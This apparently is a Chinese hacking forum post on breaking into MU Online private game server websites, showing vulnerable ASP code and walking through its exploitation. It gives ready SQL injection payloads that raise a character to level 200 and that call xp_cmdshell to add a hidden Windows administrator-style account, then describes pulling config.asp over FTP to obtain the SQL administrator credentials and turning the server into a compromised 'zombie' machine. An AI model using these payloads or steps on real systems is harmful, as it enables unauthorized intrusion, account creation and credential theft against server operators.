入侵奇迹私服网页漏洞
呵~~~ 原来网页有SQL INJECTION漏洞!!爽死了!!这下你们要看好了`~
玩MU的朋友不要错过!!
在******.asp中,没有对userchr进行过滤,导致SQL注入.. 不给你文件名!!自己找吧!
<!--#include file="conn.asp" -->
<!--#include file="top.asp" -->
<%
n=request.form("username")
p=request.form("userchr")
if instr(n,"\'")<>0 then response.end
if instr(n,"=")<>0 then response.end
if instr(n,"%")<>0 then response.end
if n<>"" and p<>"" then
set rs1 = Server.CreateObject("ADODB.Recordset")
sql="select * from Character where AccountID=\'"&n&"\' and Name=\'"&p&"\' and pklevel<>3"
rs1.open sql,conn,1,3
只对username进行了过滤,不够严密饿.:)
下面把clearpk.asp 另存为本地htm文件,然后把action="clearPK.asp"改为action="http:///clearpk.asp,,把表单项里的maxlength去掉..OK..
在角色名称里输入: XX\';update character set clevel=200 where accountID=\'YOUID\';--
在用户名里输入:haha
好了,你的人物已经200级了饿.. dedecms.com
如过管理员未对xp_cmdshell存储过程进行限止,那么你还可以把上面的语句换为:
XX\';exec master..xp_cmdshell \'net user hu_ti$ 123 /add\';--
加了一个用户饿.. dedecms.com
测试发现,大部分的管理员都是进行远程管理..(FTP管理),
所以你在得到了一个合法用户以后可以ftp XXXX(IP)->登陆->get config.asp;
config.asp记录了SQL管理员的用户名和密码.
最后下载个SQL远程执行系统命令的程序。。
然后呢,一台肉鸡诞生了...哈哈。